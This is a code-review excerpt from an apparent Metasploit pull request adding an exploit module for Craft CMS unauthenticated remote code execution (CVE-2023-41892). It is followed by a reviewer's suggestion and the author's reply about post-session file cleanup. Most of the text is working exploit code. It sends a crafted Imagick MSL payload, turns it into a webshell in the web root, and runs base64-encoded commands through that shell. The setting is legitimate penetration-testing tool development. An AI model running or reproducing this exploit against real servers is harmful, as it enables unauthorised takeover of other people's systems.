modules/exploits/linux/http/craftcms_unauth_rce_cve_2023_41892.rb

```diff
@@ -0,0 +1,289 @@
+    form_data.add_part('{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/etc/passwd"}}}', nil, nil, 'form-data; name="config"')
+    form_data.add_part(payload, 'text/plain', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(4..8)}\"; filename=\"#{Rex::Text.rand_text_alpha(4..8)}.msl\"")
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI']),
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+    if res && res.code == 502
+      # code 502 indicates a successful upload of the MSL payload in upload_tmp_dir (default /tmp unless specified in php.ini)
+      # next step is to generate the webshell in DOCUMENT_ROOT by executing the Imagick MSL payload
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(datastore['TARGETURI']),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'vars_post' => {
+          'action' => 'conditions/render',
+          'configObject[class]' => 'craft\elements\conditions\ElementCondition',
+          'config' => "{\"name\":\"configObject\",\"as \":{\"class\":\"Imagick\", \"__construct()\":{\"files\":\"vid:msl:#{@config['upload_tmp_dir']}/php*\"}}}"
+        }
+      })
+      # code 502 indicates a successful generation of the webshell in DOCUMENT_ROOT
+      return true if res && res.code == 502
+    end
+    false
+  end
+
+  def execute_php(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def execute_command(cmd, _opts = {})
+    payload = Base64.strict_encode64(cmd)
+    php_cmd_function = datastore['COMMAND']
+    return send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(datastore['TARGETURI'], @webshell_name),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'vars_get' => {
+        @get_param => php_cmd_function
+      },
+      'vars_post' => {
+        @post_param => payload
+      }
+    })
+  end
+
+  def on_new_session(session)
+    # cleanup webshell in DOCUMENT_ROOT
+    register_files_for_cleanup("#{@config['document_root']}/#{@webshell_name}")
+
+    # Imagick plugin generates a php<random chars> file with MSL code in the directory set by
+    # the PHP ini setting "upload_tmp_dir". This file gets executed to generate the webshell.
+    # A manual cleanup procedure is required to identify and remove the php* files when the session is established.
+    if session.type == 'meterpreter'
+      session.fs.dir.chdir(@config['upload_tmp_dir'].to_s)
+      clean_files = session.fs.dir.entries
```

Comment:
I think you can pass some arguments to `session.fs.dir.entries` to handle the path and any wildcards:
```suggestion
      clean_files = session.fs.dir.entries(@config['upload_tmp_dir'].to_s, 'php*')
```
So, with this, you should be able to refactor the whole `on_new_session` method to store the file names in `clean_files` for both `meterpreter` and `shell` sessions, and then call `register_files_for_cleanup` for each entry in a single loop.

Reply:
Applied most of your suggestions, however `clean_files = session.fs.dir.entries(@config['upload_tmp_dir'].to_s, 'php*')` does not work with a `php meterpreter` session. Argument `php*` seems to be the culprit, so I kept the original `clean_files = session.fs.dir.entries`. See https://github.com/rapid7/metasploit-framework/pull/18612/commits/db099f8f4ce235dc253cc015baf6d114717909ca.